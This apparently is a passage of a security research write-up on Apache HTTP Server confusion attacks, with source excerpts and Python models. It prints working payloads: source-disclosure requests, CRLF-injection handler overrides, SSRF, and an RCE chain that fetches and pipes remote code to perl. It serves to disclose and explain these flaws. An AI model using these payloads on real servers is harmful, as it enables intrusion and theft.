    if (*p != '\0') {
        /* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */
        memmove(env_script_filename, p, strlen(p) + 1);
        apache_was_here = 1;
    }
    /* ignore query string if sent by Apache (RewriteRule) */
    p = strchr(env_script_filename, '?');
    if (p) {
        *p =0;
    }
}

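As you can see, PHP-FPM first normalizes the filename and splits it at the question mark ? to extract the actual file path for execution (which is /var/www/html/admin.php). So basically, every authentication or access control setting that uses the Files directive for a single PHP file is at risk when running with PHP-FPM! 😮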
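
Putting the three views of the same string side by side makes the mismatch obvious. The following Python sketch is an illustration only: files_directive_applies(), fpm_handler_applies() and fpm_script_path() are hypothetical helpers that approximate the Files check, the FilesMatch pattern from the PHP-FPM configuration, and the C normalization shown above.

```python
import re

FCGI_PREFIX = "proxy:fcgi://"


def files_directive_applies(r_filename: str, protected_name: str) -> bool:
    """Approximation of <Files>: compare the last path component literally."""
    return r_filename.rsplit("/", 1)[-1] == protected_name


def fpm_handler_applies(r_filename: str) -> bool:
    """The FilesMatch pattern from the PHP-FPM configuration above."""
    return re.search(r".+\.ph(?:ar|p|tml)$", r_filename) is not None


def fpm_script_path(script_filename: str) -> str:
    """Model of the PHP-FPM logic: drop scheme and host, then cut at '?'."""
    if script_filename.lower().startswith(FCGI_PREFIX):
        rest = script_filename[len(FCGI_PREFIX):]
        slash = rest.find("/")
        if slash != -1:
            script_filename = rest[slash:]      # move past hostname and port
        script_filename = script_filename.split("?", 1)[0]
    return script_filename
```

For r->filename ending in admin.php?ooo.php, the Files check does not match, the .php handler still applies, and PHP-FPM ends up executing /var/www/html/admin.php.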

Plenty of potentially vulnerable configurations can be found on GitHub, such as phpinfo() restricted to internal network access only:

# protect phpinfo, only allow localhost and local network access
<Files php-info.php>
    # LOCAL ACCESS ONLY
    # Require local 

    # LOCAL AND LAN ACCESS
    Require ip 10 172 192.168
</Files>

Adminer blocked by .htaccess:

<Files adminer.php>
    Order Allow,Deny
    Deny from all
</Files>

Protected xmlrpc.php:

<Files xmlrpc.php>
    Order Allow,Deny
    Deny from all
</Files>

Command-line tools protected from direct access:

<Files "cron.php">
    Deny from all
</Files>

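Through the inconsistent understanding of the r->filename field between the authentication module and mod_proxy, all of the examples above can be bypassed with just a single ?!

🔥 2. DocumentRoot Confusion

The next attack is the Confusion Attack based on DocumentRoot! First, consider the following Httpd configuration: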

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

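When you visit http://server/html/about, which file does Httpd actually open? Is it /about.html under the root directory, or /var/www/html/about.html under the DocumentRoot?

The answer is: it accesses both paths. This is our second Confusion Attack. For any[1] RewriteRule, Httpd always tries to open both the path with DocumentRoot and the path without it! Interesting, right? 😉

[1] Located in the Server Config or VirtualHost Block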

Path: modules/mappers/mod_rewrite.c#L4939

    if(!(conf->options & OPTION_LEGACY_PREFIX_DOCROOT)) {
        uri_reduced = apr_table_get(r->notes, "mod_rewrite_uri_reduced");
    }

    if (!prefix_stat(r->filename, r->pool) || uri_reduced != NULL) {     // <------ [1] access without root
        int res;
        char *tmp = r->uri;

        r->uri = r->filename;
        res = ap_core_translate(r);             // <------ [2] access with root
        r->uri = tmp;

        if (res != OK) {
            rewritelog((r, 1, NULL, "prefixing with document_root of %s"
                        " FAILED", r->filename));

            return res;
        }

        rewritelog((r, 2, NULL, "prefixed with document_root to %s",
                    r->filename));
    }

    rewritelog((r, 1, NULL, "go-ahead with %s [OK]", r->filename));
    return OK;
}
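
The decision made by this snippet can be approximated in Python. The sketch below is a simplified model and makes several assumptions: map_rewritten_path() is an invented name, the filesystem check is passed in as an exists callback so the example stays self-contained, and the uri_reduced branch is ignored.

```python
from typing import Callable


def map_rewritten_path(filename: str, document_root: str,
                       exists: Callable[[str], bool]) -> str:
    """Model of the mapping: keep the path as-is if its first segment exists."""
    # Like prefix_stat(), only the first path segment is checked.
    second_slash = filename.find("/", 1)
    first_segment = filename if second_slash == -1 else filename[:second_slash]
    if exists(first_segment):
        return filename                          # [1] access without root
    return document_root.rstrip("/") + filename  # [2] access with root


def fake_fs(path: str) -> bool:
    """Hypothetical filesystem in which only /usr and /var exist at the top level."""
    return path in {"/usr", "/var"}
```

In this model /about.html is prefixed with the DocumentRoot because nothing named /about.html exists, while /usr/share/doc/readme.html is kept as an absolute path because /usr does.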

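Of course, in most cases the target file does not exist, so Httpd accesses the version with DocumentRoot. But this behavior already lets us “intentionally” access paths outside the Web Root. If we can control the prefix of the RewriteRule target, could we then access any file on the operating system? This is the spirit of our second Confusion Attack! Countless problematic configurations can be found on GitHub, and amusingly, even an example from the official documentation is vulnerable: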

# Remove mykey=???
RewriteCond "%{QUERY_STRING}" "(.*(?:^|&))mykey=([^&]*)&?(.*)&?$"
RewriteRule "(.*)" "$1?%1%3"

There are also other affected RewriteRules, such as URL Masking rules based on caching needs or on hiding file extensions:

RewriteRule  "^/html/(.*)$"  "/$1.html"

Or rules that try to save bandwidth by serving compressed versions of static files:

RewriteRule  "^(.*)\.(css|js|ico|svg)" "$1\.$2.gz"

Rules that redirect an old website to the root directory:

RewriteRule  "^/oldwebsite/(.*)$"  "/$1"

Rules that return 200 OK for all CORS preflight requests:

RewriteCond %{REQUEST_METHOD} OPTIONS
RewriteRule ^(.*)$ $1 [R=200,L]

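In theory, as long as the target prefix of a RewriteRule is controllable, we can access nearly the entire filesystem. But the rules above show one more restriction we have to overcome: suffixes such as .html and .gz in the earlier examples keep us from being completely free. So can this restriction be bypassed? You may recall the path truncation introduced in the Filename Confusion section. By combining these two attacks, we can freely access any file on the operating system!

The following examples are all based on this unsafe RewriteRule: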

RewriteEngine On
RewriteRule  "^/html/(.*)$"  "/$1.html"

⚔️ Primitive 2-1. Server-Side Source Code Disclosure

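Let’s introduce the first technique of DocumentRoot Confusion: arbitrary server-side source code disclosure!

Since Httpd decides whether to treat a file as a Server-Side Script based on the current directory or virtual host configuration, accessing the target code through its absolute path can confuse Httpd’s logic and leak the contents of files that should have been executed as code.

✔️ 2-1-1. Disclose CGI Source Code

First is the disclosure of server-side CGI source code. mod_cgi binds the CGI directory to the specified URL prefix through ScriptAlias, so when a CGI file is visited directly by its absolute path, the URL prefix is different and the file’s source code is leaked.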

$ curl http://server/cgi-bin/download.cgi
 # the processed result from download.cgi
$ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
 # #!/usr/bin/perl
 # use CGI;
 # ...
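 # # the source code of download.cgi

✔️ 2-1-2. Disclose PHP Source Code

Next is the disclosure of server-side PHP source code. Since PHP has many usage scenarios, if the PHP environment is applied only to specific directories or virtual hosts (common in web hosting), PHP files can be accessed through a virtual host that does not have PHP enabled to disclose their source code!

For example, www.local and static.local are two virtual hosts hosted on the same server; www.local is allowed to run PHP while static.local only serves static files. The sensitive information in config.php can therefore be disclosed as follows: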

$ curl http://www.local/config.php
 # the processed result (empty) from config.php
$ curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
 # the source code of config.php

⚔️ Primitive 2-2. Local Gadgets Manipulation!

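Next is our second technique: Local Gadgets Manipulation!

First, when “accessing any file on the operating system” was mentioned earlier, you may have wondered: “Hey, so can an unsafe RewriteRule access /etc/passwd?” Yes, but also not exactly. Huh?

Technically, the server does check whether /etc/passwd exists, but Apache HTTP Server’s built-in access control blocks our access. Here is a snippet from the Apache HTTP Server configuration template: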

<Directory />
    AllowOverride None
    Require all denied
</Directory>

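You will notice that access to the root directory / is blocked by default (Require all denied). So is that the end of the road? Digging further into the various Httpd distributions reveals that Debian/Ubuntu allows /usr/share by default: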

<Directory /usr/share>
    AllowOverride None
    Require all granted
</Directory>

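So our “arbitrary file access” does not seem quite so arbitrary. Still, breaking the assumption that only the DocumentRoot can be accessed is a big step forward. The next thing to do is “squeeze” every possibility out of this directory. All available resources, existing tutorials and examples, documentation, unit test files, and even programming languages on the server such as PHP and Python, or PHP modules, could become targets for abuse!

P.S. Of course, the explanation above is based only on the Httpd configuration shipped with Ubuntu/Debian. In practice, we have also found applications that simply remove Require all denied from the root directory, allowing direct access to /etc/passwd.

✔️ 2-2-1. Local Gadget to Information Disclosure

Let’s look for files in this directory that can be exploited. First, if the target Apache HTTP Server has the websocketd service installed, the package places an example PHP script, dump-env.php, under /usr/share/doc/websocketd/examples/php/ by default. If a PHP environment exists on the target server, this example script can be accessed directly to leak sensitive environment variables.

Additionally, if the target also has services such as Nginx or Jetty installed, although /usr/share should in theory hold read-only copies placed there at package installation, the default Web Roots of these services are located under /usr/share, so this technique can also leak sensitive information from those web applications, such as web.xml in Jetty: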

  • /usr/share/nginx/html/
  • /usr/share/jetty9/etc/
  • /usr/share/jetty9/webapps/

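Here is a simple demonstration that leaks the phpinfo() output by accessing the read-only copy of setup.php from the Davical package.

✔️ 2-2-2. Local Gadget to XSS

Next, how can this technique be turned into XSS? The Ubuntu Desktop environment installs LibreOffice, an open-source office suite, by default. The language-switching feature in its help files can be used to achieve XSS.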

Path: /usr/share/libreoffice/help/help.html

    var url = window.location.href;
    var n = url.indexOf('?');
    if (n != -1) {
        // the URL came from LibreOffice help (F1)
        var version = getParameterByName("Version", url);
        var query = url.substr(n + 1, url.length);
        var newURL = version + '/index.html?' + query;
        window.location.replace(newURL);
    } else {
        window.location.replace('latest/index.html');
    }

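Therefore, even if the target has not deployed any web application, we can still create XSS from files shipped with the operating system through an unsafe RewriteRule.

✔️ 2-2-3. Local Gadget to LFI

What about arbitrary file reading? If the target server has PHP or front-end packages installed, such as JpGraph, jQuery-jFeed, or even WordPress or Moodle plugins, their bundled tutorials or debugging code can become our gadgets, for example: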

  • /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
  • /usr/share/javascript/jquery-jfeed/proxy.php
  • /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Here we demonstrate reading /etc/passwd using the proxy.php bundled with jQuery-jFeed.

✔️ 2-2-4. Local Gadget to SSRF

Finding an SSRF is also no problem. For example, MagpieRSS provides a magpie_debug.php file that makes an excellent gadget:

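  • /usr/share/php/magpierss/scripts/magpie_debug.php

✔️ 2-2-5. Local Gadget to RCE

So, can we get RCE? Not so fast, let’s take it step by step! First, this technique can already reapply the entire existing attack surface. For example, an old version of PHPUnit accidentally left behind during development (or perhaps even depended on by a third-party package) can be exploited directly with CVE-2017-9841 to execute arbitrary code. Or consider an installed phpLiteAdmin (since it is a read-only copy, the default password is admin). By now you should see that Local Gadgets Manipulation has endless potential; what remains is simply to discover more powerful and more universal gadgets!

⚔️ Primitive 2-3. Jailbreak from Local Gadgets

You might ask: “Can we really not break out of /usr/share?” Of course we can, and that is the third technique to introduce: jailbreaking from /usr/share!

In the Debian/Ubuntu distributions of Httpd, the FollowSymLinks option is enabled by default. Even on non-Debian/Ubuntu distributions, Apache HTTP Server implicitly allows symbolic links by default.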

<Directory />
    Options FollowSymLinks
    AllowOverride None
    Require all denied
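</Directory>

✔️ 2-3-1. Jailbreak from Local Gadgets

Therefore, whenever a package places a symbolic link in its installation directory that points outside /usr/share, that link becomes a springboard for reaching more gadgets and completing further exploitation. Here are some exploitable symbolic links we have found so far: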

  • Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
  • Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
  • Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
  • MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
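  • SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/

✔️ 2-3-2. Jailbreak Local Gadgets to Redmine RCE

To conclude the jailbreak technique, let’s demonstrate an RCE that uses a double-hop symbolic link jump in Redmine. In a default Redmine installation, the code directory contains an instances/ directory that points to /var/lib/redmine/, and the default/config/ directory under /var/lib/redmine/ in turn points to the /etc/redmine/default/ folder, which stores Redmine’s database configuration and application secret key.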

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/default/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt
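
The two symlink hops shown above can be reproduced in a throwaway directory. The following is a minimal sketch, assuming a POSIX system; the directory layout is a hypothetical copy of the Redmine paths, and `build_demo_tree` and `resolve_under` are illustrative helper names, not part of any real tool.

```python
import os
import tempfile
from typing import Tuple


def resolve_under(root: str, relative: str) -> Tuple[str, bool]:
    """Resolve `relative` below `root`, following symlinks, and report
    whether the final target still lives inside `root`."""
    real_root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(real_root, relative))
    inside = os.path.commonpath([real_root, target]) == real_root
    return target, inside


def build_demo_tree(base: str) -> str:
    """Create a hypothetical layout that mirrors the two symlink hops."""
    share = os.path.join(base, "usr/share/redmine")
    var = os.path.join(base, "var/lib/redmine/default")
    etc = os.path.join(base, "etc/redmine/default")
    for directory in (share, var, etc):
        os.makedirs(directory)
    with open(os.path.join(etc, "secret_key.txt"), "w") as fh:
        fh.write("not-a-real-key\n")
    # Hop 1: usr/share/redmine/instances -> var/lib/redmine
    os.symlink(os.path.join(base, "var/lib/redmine"),
               os.path.join(share, "instances"))
    # Hop 2: var/lib/redmine/default/config -> etc/redmine/default
    os.symlink(etc, os.path.join(var, "config"))
    return os.path.join(base, "usr/share")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        root = build_demo_tree(base)
        target, inside = resolve_under(
            root, "redmine/instances/default/config/secret_key.txt")
        print(target, "| still inside root:", inside)
```

The resolved path ends up outside the directory that was supposed to be the boundary, which is exactly what makes such links useful as a springboard.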

So with one unsafe RewriteRule and two layers of symbolic links, we can easily read the application secret key used by Redmine:

$ curl http://server/html/usr/share/redmine/instances/default/config/secret_key.txt%3f
 HTTP/1.1 200 OK
 Server: Apache/2.4.59 (Ubuntu) 
 ...
 6d222c3c3a1881c865428edb79a74405

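Redmine is built on Ruby on Rails, and the content of secret_key.txt is exactly the key it uses for signing and encryption. The next steps should be familiar to anyone who has attacked RoR before: use the known key to sign and encrypt a malicious Marshal object, embed it in a cookie, and achieve remote code execution through server-side deserialization!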

🔥 3. Handler Confusion

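The last attack to introduce is confusion over the handler. It also exploits a piece of technical debt left over from the ancient architecture of Apache HTTP Server. Here is an example to get a quick feel for it: if you want to run the classic mod_php on Httpd today, which of the following two directives do you think is correct?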

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

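The answer is that both of them get PHP running correctly! Below are the syntax definitions of the two directives. Not only are their usage and arguments similar, even their effect is now identical, so why did Apache HTTP Server design two different directives in the first place?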

AddHandler handler-name extension [extension] ...
AddType media-type extension [extension] ...

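In fact, handler-name and media-type are different fields in Httpd's internal structure, corresponding to r->handler and r->content_type respectively. Users can mix them up without noticing thanks to a piece of code that has survived since the early development of Apache HTTP Server in 1996: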

Path: server/config.c#L420

AP_CORE_DECLARE(int) ap_invoke_handler(request_rec *r) {

    // [...]

    if (!r->handler) {
        if (r->content_type) {
            handler = r->content_type;
            if ((p=ap_strchr_c(handler, ';')) != NULL) {
                char *new_handler = (char *)apr_pmemdup(r->pool, handler,
                                                        p - handler + 1);
                char *p2 = new_handler + (p - handler);
                handler = new_handler;

                /* exclude media type arguments */
                while (p2 > handler && p2[-1] == ' ')
                    --p2; /* strip trailing spaces */

                *p2='\0';
            }
        }
        else {
            handler = AP_DEFAULT_HANDLER_NAME;
        }

        r->handler = handler;
    }

    result = ap_run_handler(r);

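As you can see, before entering the main module handler ap_run_handler(), if r->handler is empty, the content of r->content_type is used as the final module handler. This is the main reason AddType and AddHandler behave the same: the media-type is converted into a handler-name right before execution. Our third attack, Handler Confusion, is built around this behavior.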
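
The fallback in the C excerpt above can be restated as a small model. This is a sketch for illustration only, not Httpd code: `effective_handler` is a hypothetical name, and `DEFAULT_HANDLER_NAME` is a placeholder standing in for AP_DEFAULT_HANDLER_NAME, whose real value is not shown in the excerpt.

```python
from typing import Optional

# Placeholder for AP_DEFAULT_HANDLER_NAME (actual value not shown in the excerpt).
DEFAULT_HANDLER_NAME = "<default>"


def effective_handler(handler: Optional[str],
                      content_type: Optional[str]) -> str:
    """Model of the r->handler / r->content_type fallback."""
    if handler is not None:
        # An explicit handler (e.g. set by AddHandler or SetHandler) wins.
        return handler
    if content_type is None:
        return DEFAULT_HANDLER_NAME
    head, sep, _params = content_type.partition(";")
    if sep:
        # Drop media type parameters, then trailing spaces before the ';'.
        return head.rstrip(" ")
    return content_type


if __name__ == "__main__":
    # AddType route: no handler set, so the media type becomes the handler.
    print(effective_handler(None, "application/x-httpd-php"))
    # AddHandler route: the handler is used as-is.
    print(effective_handler("application/x-httpd-php", None))
```

Both calls produce the same handler name, which is why the two directives look interchangeable from the outside.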

⚔️ Primitive 3-1. Overwrite the Handler

With this conversion in mind, the first primitive is Overwrite the Handler. Imagine that the target Apache HTTP Server runs PHP through AddType:

AddType application/x-httpd-php  .php

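In the normal flow, when http://server/config.php is requested, mod_mime first copies the value configured by AddType for the file extension into r->content_type during the type_checker phase. Since r->handler is never assigned during the whole HTTP lifecycle, ap_invoke_handler() treats r->content_type as the handler right before running the module handlers, and mod_php ends up processing the request.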

But what happens if some module "accidentally" overwrites r->content_type before ap_invoke_handler() is reached?

✔️ 3-1-1. Overwrite Handler to Disclose PHP Source Code

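The first exploit of this primitive uses that "accident" to disclose the source code of arbitrary PHP files. The technique was first mentioned by Max Dmitriev in his research presented at ZeroNights 2021 (kudos to him!). The talk title and slides are available here: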

Apache 0day bug, which still nobody knows of, and which was fixed accidentally

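Max Dmitriev observed that sending an invalid Content-Length makes the remote Httpd server hit an unexplained error and return the PHP source code along with it. After tracing the flow, he found the cause was a double response: ModSecurity does not properly handle the AP_FILTER_ERROR return value when using the APR (Apache Portable Runtime) library. When the error occurs, Httpd wants to send an HTML error message, so r->content_type is also overwritten with text/html.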

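Because ModSecurity does not handle the return value properly, the internal Httpd flow that should have stopped continues to run. This "side effect" overwrites the Content-Type that was set earlier, so a file that should have been treated as PHP is served as a plain document, printing its source code and sensitive settings. 🤫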

$ curl -v http://127.0.0.1/info.php -H "Content-Length: x"
> HTTP/1.1 400 Bad Request
> Date: Mon, 29 Jul 2024 05:32:23 GMT
> Server: Apache/2.4.41 (Ubuntu)
> Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
...
<?php phpinfo();?>
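
The sequence behind this disclosure can be modelled in a few lines. This is a rough sketch under simplifying assumptions: the `Request` class, `type_checker`, `pick_handler` and `serve` are hypothetical stand-ins for the phases described above, and the error path is reduced to a single flag.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Request:
    handler: Optional[str] = None
    content_type: Optional[str] = None


def type_checker(req: Request, filename: str, add_type: Dict[str, str]) -> None:
    """Stand-in for mod_mime: copy the AddType value for the extension."""
    for extension, media_type in add_type.items():
        if filename.endswith(extension):
            req.content_type = media_type


def pick_handler(req: Request) -> str:
    """Stand-in for the legacy conversion in ap_invoke_handler()."""
    if req.handler is not None:
        return req.handler
    if req.content_type is None:
        return "<default>"  # placeholder for the default handler
    head, sep, _params = req.content_type.partition(";")
    return head.rstrip(" ") if sep else req.content_type


def serve(filename: str, add_type: Dict[str, str], error_side_effect: bool) -> str:
    req = Request()
    type_checker(req, filename, add_type)
    if error_side_effect:
        # The error response overwrites the type that AddType had set.
        req.content_type = "text/html; charset=iso-8859-1"
    return pick_handler(req)


if __name__ == "__main__":
    config = {".php": "application/x-httpd-php"}
    print(serve("info.php", config, error_side_effect=False))
    print(serve("info.php", config, error_side_effect=True))
```

In the second call the request no longer resolves to the PHP handler, so the file would be served as a document instead of being executed.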

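In theory, any configuration based on Content-Type is vulnerable to this kind of problem. So besides the php-cgi with mod_actions setup that Max demonstrated in his slides, plain mod_php paired with AddType is affected as well.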

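It is also worth mentioning that this side effect was corrected in Apache HTTP Server 2.4.44 as a bug fix that improved the request parser, so the "vulnerability" was considered fixed until I picked it up again. However, since the root cause is still that ModSecurity does not handle errors properly, the same behavior can be reproduced as long as another path that triggers AP_FILTER_ERROR is found.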

P.S. This issue was reported to ModSecurity through the official email address on 6/20, and the Project Co-Leader suggested moving the discussion back to the original GitHub Issue.

✔️ 3-1-2. Overwrite Handler to ██████ ███████ ██████

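Based on the double response behavior and its side effects described above, this primitive enables other, even cooler exploitation. However, since the issue has not been fully fixed, further details will be disclosed once the fix is complete.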

⚔️ Primitive 3-2. Invoke Arbitrary Handlers

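Think carefully about the Overwrite Handler primitive: although the request ends up with the wrong Content-Type because ModSecurity does not handle errors properly, the deeper root cause is that Apache HTTP Server cannot tell the semantics of r->content_type when it uses it. The field can hold a value set by a directive during the request phase, or the content of the Content-Type header returned by the server during the response phase.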

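So in theory, if you can control the Content-Type header in the server's response, you can invoke arbitrary module handlers through that piece of legacy code. This is the last primitive of Handler Confusion: invoking any internal module handler of Apache HTTP Server.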

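There is still one last piece of the puzzle. In Httpd, every place where r->content_type can be modified from the server response runs after that legacy code. Even if the field is modified, the HTTP lifecycle is already coming to an end by then, so nothing more can be done with it... or can it?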

We brought in RFC 3875 as our relief pitcher! RFC 3875 is the specification for CGI, and Section 6.2.2 defines a Local Redirect Response behavior:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

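Simply put, the specification requires that under certain conditions CGI must handle the redirect using server-side resources. A close look at how mod_cgi implements this reveals: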

Path: modules/generators/mod_cgi.c#L983

    if ((ret = ap_scan_script_header_err_brigade_ex(r, bb, sbuf,          // <------ [1]
                                                    APLOG_MODULE_INDEX)))
    {
        ret = log_script(r, conf, ret, dbuf, sbuf, bb, script_err);

        // [...]

        if (ret == HTTP_NOT_MODIFIED) {
            r->status = ret;
            return OK;
        }

        return ret;
    }

    location = apr_table_get(r->headers_out, "Location");

    if (location && r->status == 200) {
        // [...]
    }

    if (location && location[0] == '/' && r->status == 200) {          // <------ [2]
        /* This redirect needs to be a GET no matter what the original
         * method was.
         */
        r->method = "GET";
        r->method_number = M_GET;

        /* We already read the message body (if any), so don't allow
         * the redirected request to think it has one.  We can ignore
         * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
         */
        apr_table_unset(r->headers_in, "Content-Length");

        ap_internal_redirect_handler(location, r);                     // <------ [3]
        return OK;
    }

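First, mod_cgi executes [1] the CGI and scans its output to set the corresponding Status and Content-Type. If [2] the returned Status is 200 and the Location header field starts with /, the response is treated as a server-side redirect and processed [3]. A closer look at the implementation of ap_internal_redirect_handler() shows: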
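
The condition at [2] in the mod_cgi excerpt is small enough to restate on its own. The following sketch only mirrors that one check; `is_local_redirect` is a hypothetical name used for illustration.

```python
from typing import Optional


def is_local_redirect(status: int, location: Optional[str]) -> bool:
    """Mirror of the check at [2]: a Location header that starts with '/'
    combined with status 200 is reprocessed on the server side."""
    return location is not None and location.startswith("/") and status == 200


if __name__ == "__main__":
    for status, location in [(200, "/ooo"),
                             (200, "http://example.com/"),
                             (302, "/ooo"),
                             (200, None)]:
        print(status, location, is_local_redirect(status, location))
```

Only the first combination takes the internal redirect path; an absolute URL or a non-200 status does not.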

Path: modules/http/http_request.c#L800

AP_DECLARE(void) ap_internal_redirect_handler(const char *new_uri, request_rec *r)
{
    int access_status;
    request_rec *new = internal_internal_redirect(new_uri, r);    // <------ [1]

    /* ap_die was already called, if an error occured */
    if (!new) {
        return;
    }

    if (r->handler)
        ap_set_content_type(new, r->content_type);                // <------ [2]
    access_status = ap_process_request_internal(new);             // <------ [3]
    if (access_status == OK) {
        access_status = ap_invoke_handler(new);                   // <------ [4]
    }
    ap_die(access_status, new);
}

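Httpd first creates [1] a new request structure and copies [2] the current r->content_type into it. After processing [3] the request lifecycle, it calls [4] ap_invoke_handler(), the place that contains the legacy conversion mentioned earlier. So in a server-side redirect, if you can control the response headers, you can invoke any module handler in Httpd. Basically all CGI-family implementations in Apache HTTP Server follow this behavior. Here is a short list: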

  • mod_cgi
  • mod_cgid
  • mod_wsgi
  • mod_uwsgi
  • mod_fastcgi
  • mod_perl
  • mod_asis
  • mod_fcgid
  • mod_proxy_scgi
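
The four numbered steps of ap_internal_redirect_handler() can be traced with a toy model. This is a sketch under simplifying assumptions rather than a port of the C code: the `Request` class is hypothetical, `process_request` stands in for ap_process_request_internal() and does nothing by default, and "cgi-script" is used as the handler name of the original CGI request.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class Request:
    uri: str
    handler: Optional[str] = None
    content_type: Optional[str] = None


def pick_handler(req: Request) -> str:
    """Stand-in for the legacy conversion in ap_invoke_handler()."""
    if req.handler is not None:
        return req.handler
    if req.content_type is None:
        return "<default>"  # placeholder for the default handler
    head, sep, _params = req.content_type.partition(";")
    return head.rstrip(" ") if sep else req.content_type


def internal_redirect_handler(
        new_uri: str, r: Request,
        process_request: Callable[[Request], None] = lambda req: None) -> str:
    new = Request(uri=new_uri)             # [1] fresh request structure
    if r.handler is not None:
        new.content_type = r.content_type  # [2] response type carried over
    process_request(new)                   # [3] request lifecycle (no-op here)
    return pick_handler(new)               # [4] type is turned into a handler


if __name__ == "__main__":
    # The CGI response set Content-Type to an attacker-chosen value.
    cgi = Request(uri="/cgi-bin/redir.cgi", handler="cgi-script",
                  content_type="server-status")
    print(internal_redirect_handler("/ooo", cgi))
```

The value that started life as a response header comes out the other end as the handler name for the redirected request.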

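So how can this server-side redirect be triggered in a real-world scenario? Since you need to control at least the Content-Type and part of the Location in the HTTP response, here are two scenarios for reference:

  1. A CRLF Injection in the CGI response headers, which allows overwriting existing HTTP headers with new lines
  2. An SSRF that fully controls the response headers, such as the django-revproxy project hosted on mod_wsgi

The following examples are all based on this insecure CRLF Injection: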

#!/usr/bin/perl 
 
use CGI;
my $q = CGI->new;
my $redir = $q->param("r");
if ($redir =~ m{^https?://}) {
    print "Location: $redir\n";
}
print "Content-Type: text/html\n\n";

✔️ 3-2-1. Arbitrary Handler to Information Disclosure

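First, going from arbitrary handler invocation to information disclosure. Here we use Httpd's built-in server-status handler, which is usually only accessible from the local machine: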

<Location /server-status>
    SetHandler server-status
    Require local
</Location>

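With the ability to invoke arbitrary handlers, we can overwrite the Content-Type to reach sensitive information that would otherwise be inaccessible: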

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a
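
To see why the injected lines take over the response headers, the sample CGI can be imitated offline. This is a simplified simulation: `cgi_output` mimics what the Perl script prints, `scan_headers` is a hypothetical parser that stops at the first empty line and lets later duplicates win (an assumption that only loosely models the server's header scan), and the display spaces in the payload above are removed.

```python
from typing import Dict
from urllib.parse import unquote


def cgi_output(r_param: str) -> str:
    """Mimic the output of the sample Perl script for a given `r` value."""
    out = ""
    if r_param.startswith(("http://", "https://")):
        out += f"Location: {r_param}\n"
    out += "Content-Type: text/html\n\n"
    return out


def scan_headers(raw: str) -> Dict[str, str]:
    """Parse header lines up to the first empty line; later duplicates win."""
    headers: Dict[str, str] = {}
    for line in raw.replace("\r\n", "\n").split("\n"):
        if line == "":
            break
        name, _sep, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


if __name__ == "__main__":
    payload = unquote(
        "http://%0d%0aLocation:/ooo%0d%0aContent-Type:server-status%0d%0a%0d%0a")
    print(scan_headers(cgi_output(payload)))
    print(scan_headers(cgi_output("http://example.com/")))
```

The injected empty line ends the header block early, so the script's own Content-Type line falls into the body and the attacker-supplied values are the ones that get parsed.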

✔️ 3-2-2. Arbitrary Handler to Misinterpret Scripts

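It is also easy to turn an image into a PHP backdoor. For example, after a user uploads a file with a legitimate extension, this primitive can name mod_php as the handler to execute the malicious code embedded in the file: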

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a

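✔️ 3-2-3. Arbitrary Handler to Full SSRF

Invoking mod_proxy to reach any protocol and any URL is no problem either, for example:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3f %0d%0a
%0d%0a

This is also an SSRF that fully controls the HTTP request and retrieves the entire HTTP response! One slight disappointment is that when accessing Cloud Metadata, mod_proxy automatically adds an X-Forwarded-For header, which gets the request blocked by the metadata protection mechanisms of EC2 and GCP. Otherwise this would be an even more powerful primitive.

✔️ 3-2-4. Arbitrary Handler to Access Local Unix Domain Socket

However, mod_proxy offers an even more "convenient" feature: it can access local Unix Domain Sockets! 😉

Here we demonstrate executing a PHP backdoor located under /tmp/ by accessing PHP-FPM's local Unix Domain Socket:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

In theory this technique has even more potential, such as protocol smuggling (smuggling FastCGI inside HTTP/HTTPS 😏) or other vulnerable local sockets. I leave these to anyone interested in exploring further.

✔️ 3-2-5. Arbitrary Handler to RCE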

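Finally, let's show how to turn this primitive into RCE with a common CTF trick! The official PHP Docker image includes PEAR, a command-line PHP package manager, at build time. Using its Pearcmd.php as an entry point lets us go further. For the history and details, see the Docker PHP LFI summary written by Phith0n.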

Here we use the Command Injection in run-tests to complete the attack chain. The full chain looks like this:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

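Security advisories and bug bounty reports often treat CRLF Injection or Header Injection as XSS. It is true that these can sometimes be chained through SSO into impressive bugs such as Account Takeover, but don't forget that they can also lead to server-side RCE, and this demonstration proves it!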
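
Since the whole chain starts with a header value that is allowed to contain line breaks, one way a script like the sample CGI could refuse such input is to reject control characters before printing the header. This is a minimal sketch of that idea, not a complete defense; `safe_header_value` is a hypothetical helper.

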